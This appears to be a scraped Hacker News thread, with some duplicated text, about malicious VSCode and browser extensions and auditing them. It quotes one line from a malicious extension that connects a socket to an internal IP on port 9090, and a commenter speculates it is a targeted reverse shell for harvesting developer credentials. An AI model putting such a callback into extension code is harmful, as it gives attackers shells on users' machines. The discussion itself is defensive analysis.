There is an obvious exception: if you control the code. Many extensions have github repos where you can clone them and build your own version.
I have a long running personal extension where I collect all the functionality I need from open source extensions. Audit once, run forever with minor API updates every few years. The only third party ones I run are uBlock Origin and 1Password's official extension. With ChatGPT the audit/integration process has become loads simpler.
I even have a native extension bridge like 1password to interact with a Rust agent (to save and index visited pages, etc.)
And then goes on to say that it mostly looks innocent. Except to me, that makes me think that this code is probably aimed at a specific target where they've already hacked one internal box, but there's not much interesting they can get from that box directly, but are now using it as a proxy to try to get a command prompt on developers machines where it's more likely there will be random passwords and configuration data that could be harvested.
It could even feasibly point to someone who's already employed by the victim company who knows that plugin is used by developers with more access credentials than they have, and are trying to extract them without anything pointing to them. At some point in the future, they could just add that IP to their box that's already in the target network and bingo shells on their victims machines would start appearing.
8 comments
[ 5.2 ms ] story [ 35.2 ms ] threadI have a long running personal extension where I collect all the functionality I need from open source extensions. Audit once, run forever with minor API updates every few years. The only third party ones I run are uBlock Origin and 1Password's official extension. With ChatGPT the audit/integration process has become loads simpler.
I even have a native extension bridge like 1password to interact with a Rust agent (to save and index visited pages, etc.)
> client_sock. connect (9090, "192.168.71.132", () → { ...
And then goes on to say that it mostly looks innocent. Except to me, that makes me think that this code is probably aimed at a specific target where they've already hacked one internal box, but there's not much interesting they can get from that box directly, but are now using it as a proxy to try to get a command prompt on developers machines where it's more likely there will be random passwords and configuration data that could be harvested.
It could even feasibly point to someone who's already employed by the victim company who knows that plugin is used by developers with more access credentials than they have, and are trying to extract them without anything pointing to them. At some point in the future, they could just add that IP to their box that's already in the target network and bingo shells on their victims machines would start appearing.
https://news.ycombinator.com/item?id=40624000 - We Hacked Multi-Billion $ Companies in 30 Minutes with a VSCode Extension
https://news.ycombinator.com/item?id=40624855 - Malicious VSCode extensions with installs discovered